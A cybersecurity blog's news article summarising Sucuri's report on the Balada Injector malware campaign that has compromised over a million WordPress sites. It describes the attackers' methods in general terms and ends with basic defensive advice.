“Massive Balada Injector Malware Campaign Infects Over 1 Million WordPress Sites”

Reading Time: ( Word Count: )

April 10, 2023
Nextdoorsec-course

A malicious campaign named Balada Injector has reportedly infected over one million WordPress websites since 2017. GoDaddy’s Sucuri has noted that the campaign exploits all known and recently discovered vulnerabilities in WordPress plugins and themes to infiltrate the sites. 

The attackers use a preference for String.fromCharCode puzzlement, along with freshly registered domain names hosting malicious scripts on random subdomains, and redirects to various scam sites to carry out the attacks. 

The malware generates fake WordPress admin users, harvests data in the underlying hosts, and leaves backdoors for continued access. In addition, the attacks search for tools like admirer and phpmyadmin that site administrators could have left behind upon completing maintenance tasks, enabling attackers to read or download arbitrary site files, including backups and database dumps, log, and error files.

Massive Balada Injector Malware

Also, Read; Winter Vivern: “The Latest Cyber Threat Targeting European Governments”

Furthermore, the Balada Injector campaign relies on over 100 domains and many methods to exploit known security flaws, including HTML injection and Site URLs. The attackers primarily attempt to obtain database credentials in the wp-config.php file, and the attacks engineer to read or download arbitrary site files. 

The compromised site’s top-level directories are further searched for writable directories that belong to other sites. Compromising just one site can grant access to several different sites for free. 

If these attack pathways are unattainable, the admin password is brute-forced through a batch of 74 predefined credentials. WordPress consumers must keep their website software up-to-date, uninstall unused plugins and themes, and use strong WordPress admin passwords.

The report comes after Doctor Web discovered a Linux malware family that exploits flaws in over two dozen plugins and themes to endanger vulnerable WordPress sites. Weeks later, Palo Alto Networks Unit 42 found a comparable vicious JavaScript injection campaign that redirects site visitors to adware and scam pages, affecting over 51,000 websites since 2022. 

The attackers use String.fromCharCode as a bafflement technique to inject malicious JS code on the homepages of detected websites, potentially targeting valid consumers as they are more likely to visit the website’s homepage.

Saher

Saher

Author

Saher is a cybersecurity researcher with a passion for innovative technology and AI. She explores the intersection of AI and cybersecurity to stay ahead of evolving threats.

Other interesting articles

The Popularity of Esports And Its Trends

The Popularity of Esports And Its Trends

Esports, the world of competitive video gaming, has become popular in recent years. It captivates millions of ...
Online Games You Can Win Money From

Online Games You Can Win Money From

In the digital age, online gaming has become more than just a source of entertainment. It has evolved into a ...
Netstat vs. Nmap vs. Netcat: Understanding the Differences

Netstat vs. Nmap vs. Netcat: Understanding the Differences

In networking and system administration, various tools help professionals analyze and troubleshoot network ...
Nmap vs. Nessus: A Comprehensive Comparison

Nmap vs. Nessus: A Comprehensive Comparison

Regarding network security and vulnerability assessment, two popular tools that often come to mind are Nmap and ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *